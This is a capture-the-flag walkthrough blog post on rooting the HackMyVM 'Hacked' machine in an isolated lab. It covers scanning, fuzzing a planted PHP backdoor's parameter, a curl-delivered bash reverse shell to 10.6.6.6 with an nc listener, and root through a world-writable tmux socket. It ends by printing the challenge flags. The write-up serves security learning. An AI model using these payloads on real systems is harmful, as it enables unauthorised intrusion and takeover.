0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | Hacked

In this walkthrough, I demonstrate how I obtained complete ownership of Hacked from HackMyVM
0xBEN
5 min read
HackMyVM | Hacked
https://downloads.hackmyvm.eu/hacked.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Hard Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.95 scan initiated Tue Dec  2 14:41:51 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.19
Nmap scan report for 10.9.9.19
Host is up (0.00059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)
|   256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)
|_  256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec  2 14:42:04 2025 -- 1 IP address (1 host up) scanned in 12.66 seconds
echo -e '10.9.9.19\t\thacked.hmv' | sudo tee -a /etc/hosts

Add "hacked.hmv" host entry for convenience





Service Enumeration

TCP/80

Penetration Testing

Initial Enumeration

ℹ️
Since this is a direct CTF challenge and less of a simulated web application, I'll just skip straight to the penetration testing phase (as opposed to the preliminary walking of the application).
No extra goodies in the page source
"robots.txt" entry...
Looks like a potential list of steps "h4x0r" took, so maybe there's a web shell installed already



Directory and File Enumeration

gobuster dir -u http://hacked.hmv -x php,txt --db -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -o dir.txt

Tried some other word lists too, but couldn't find anything substantial

find /usr/share/seclists | grep -i shell
Seems like a good candidate
gobuster dir -u http://hacked.hmv -w /usr/share/seclists/Web-Shells/backdoor_list.txt -t 100 -o dir.txt
Looks like it's time for some parameter fuzzing



Parameter Fuzzing

gobuster fuzz -u 'http://hacked.hmv/simple-backdoor.php?FUZZ=whoami' -t 100 \
-w '/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt' \
-o fuzz.txt
We need to filter out the response size of 62
gobuster fuzz -u 'http://hacked.hmv/simple-backdoor.php?FUZZ=whoami' -t 100 \
-w '/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt' \
-o fuzz.txt --exclude-length 62
So, the parameter name is secret
curl 'http://hacked.hmv/simple-backdoor.php?secret=whoami'
Perfect...





Exploit

Reusing the Backdoor

sudo rlwrap nc -lnvp 443

Start a TCP socket to catch the reverse shell

curl -G 'http://hacked.hmv/simple-backdoor.php' --data-urlencode 'secret=/bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"''
  • The -G parameter tells curl to use the --data-urlencode in the HTTP GET request query string
  • --data-urlencode will URL encode any characters for us automatically
  • '"'"' is needed to nest single quotes within single quotes
    • Double-quotes would cause bash to interpret the & in the -c command
Success!





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux hacked 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: sudo: command not found



Users and Groups

Local Users

h4x0r:x:1000:1000:h4x0r,,,:/home/h4x0r:/bin/bash

Local Groups

cdrom:x:24:h4x0r
floppy:x:25:h4x0r
audio:x:29:h4x0r
dip:x:30:h4x0r
video:x:44:h4x0r
plugdev:x:46:h4x0r
netdev:x:109:h4x0r
h4x0r:x:1000:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:f7:ad:31 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.19/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6083sec preferred_lft 6083sec
    inet6 fe80::be24:11ff:fef7:ad31/64 scope link 
       valid_lft forever preferred_lft forever



Interesting Files

/tmp/.hacked

find / -writable -exec ls -l {} \; 2>/dev/null | grep -vE '/proc|/sys'    

...
...
...
srwxrwxrwx 1 root root 0 Dec  2 14:41 /tmp/.hacked

file /tmp/.hacked

/tmp/.hacked: socket





Privilege Escalation

Becoming Root

Finding Parent Process of Unix Socket

The /tmp/.hacked Unix socket is interesting, because it is owned by root and in a world-writable directory like /tmp. But, try as I might, I cannot see the process using ps aux or pspy. I'd like to find which parent process created this Unix socket, so I have a better idea what I'm dealing with, as I suspect it is the process associated with the Root shell created. step from secretnote.txt.

for pid in $(seq 1 1000); do [ -r "/proc/$pid/cmdline" ] && echo "Command line of /proc/$pid" && tr '\0' ' ' < "/proc/$pid/cmdline" && echo && echo ; done

One-liner to brute-force procfs and inspect cmdline of each

Interesting! Looks like the Unix socket on /tmp/.hacked is a detached tmux session



Attach to Tmux Session

tmux -S /tmp/.hacked attach



Flags

User

HMVimthabesthacker

Root

HMVhackingthehacker
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.